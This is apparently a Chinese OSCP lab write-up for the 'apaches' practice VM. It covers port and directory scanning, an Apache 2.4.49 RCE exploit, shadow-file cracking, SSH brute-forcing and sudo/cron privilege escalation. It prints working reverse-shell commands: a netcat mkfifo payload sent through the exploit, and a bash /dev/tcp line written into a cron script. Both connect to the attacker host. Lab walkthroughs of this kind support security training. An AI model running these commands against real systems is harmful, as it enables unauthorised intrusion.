【OSCP】apaches

admin 2024年5月24日20:36:22评论6 views字数 1783阅读5分56秒阅读模式
【OSCP】apaches

OSCP 靶场

【OSCP】apaches

靶场介绍

apaches

easy

apache rce、crontab 提权、hydra 使用、ssh 爆破、nano 提权、sudo 提权

信息收集

主机发现

【OSCP】apaches

【OSCP】apaches

端口扫描

└─# nmap -sV -A -p- -T4 192.168.31.232
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-13 00:04 EST
Nmap scan report for 192.168.31.232
Host is up (0.0015s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 bc:95:83:6e:c4:62:38:b5:a9:94:0c:14:a3:bf:57:34 (RSA)
| 256 07:fa:46:1a:ca:f3:dc:08:2f:72:8c:e2:f2:2e:32:e5 (ECDSA)
|_ 256 46:ff:72:d5:67:c5:1f:87:b1:35:84:29:f3:ad:e8:3a (ED25519)
80/tcp open http Apache httpd 2.4.49 ((Unix))
|_http-title: Apaches
|_http-server-header: Apache/2.4.49 (Unix)
| http-robots.txt: 1 disallowed entry
|_/
| http-methods:
|_ Potentially risky methods: TRACE
MAC Address: 08:00:27:B2:79:A9 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 1.46 ms 192.168.31.232

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.40 seconds

目录扫描

gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.31.232  -x php,html,txt -e

【OSCP】apaches

【OSCP】apaches

【OSCP】apaches

【OSCP】apaches

【OSCP】apaches

权限获取

通过searchsploit 找到apache 2.4.49 存在rce

【OSCP】apaches

【OSCP】apaches

【OSCP】apaches

/50383.sh ip.txt  /bin/sh 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.31.181 8888 >/tmp/f'

【OSCP】apaches

团队四个人四个账号。

【OSCP】apaches

【OSCP】apaches

权限提升

下载linpeas.sh 进行扫描,发现可以查看shadow 文件

【OSCP】apaches

john shadow --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt

【OSCP】apaches

【OSCP】apaches

这里得到了提示信息

【OSCP】apaches

【OSCP】apaches

查看crontab 可以看到这里利用sacagawea 账号执行了backup.sh 脚本,还有写入的权限。

【OSCP】apaches

写入反弹shell 后,提权到sacagawea 用户,成功获取第一次flag

/bin/bash -i >& /dev/tcp/192.168.31.181/8888 0>&1

【OSCP】apaches

【OSCP】apaches

从目录下找到账号密码

【OSCP】apaches

拿到密码后,使用hyrad 对其他用户进行爆破

【OSCP】apaches

【OSCP】apaches

利用sudo 成功提权到gernimo 账号

【OSCP】apaches

【OSCP】apaches

【OSCP】apaches

【OSCP】apaches

这里直接利用sudo 提权到root 权限

【OSCP】apaches

【OSCP】apaches

End

“点赞、在看与分享都是莫大的支持”

【OSCP】apaches

【OSCP】apaches

原文始发于微信公众号(贝雷帽SEC):【OSCP】apaches

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月24日20:36:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【OSCP】apacheshttps://cn-sec.com/archives/2775405.html

发表评论

匿名网友 填写信息